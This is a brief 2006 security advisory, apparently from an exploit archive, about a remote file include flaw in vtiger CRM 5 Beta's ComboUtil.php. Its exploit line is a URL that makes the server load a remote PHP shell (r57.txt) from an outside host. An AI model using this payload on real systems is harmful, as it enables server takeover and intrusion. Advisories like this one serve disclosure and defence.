Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14435
HistorySep 27, 2006 - 12:00 a.m.

vtiger CRM 5 Beta Remote File Include Vulnerability

2006-09-2700:00:00
vulners.com
68

!!!WWW.SiBERSAVASCiLAR.COM!!!

Title : vtiger CRM 5 Beta Remote File Include Vulnerability


#Author: Crackers_Child

#cont@ct: [email protected]



Download : http://vtiger.com

Bug in ComboUtil.php

require_once('include/database/PearDatabase.php');
function getComboArray($combofieldNames)


Exploit:

http://www.site.com/vtiger_path/include/ComboUtil.php?combofieldNames=http://siberaktif.net/r57.txt
?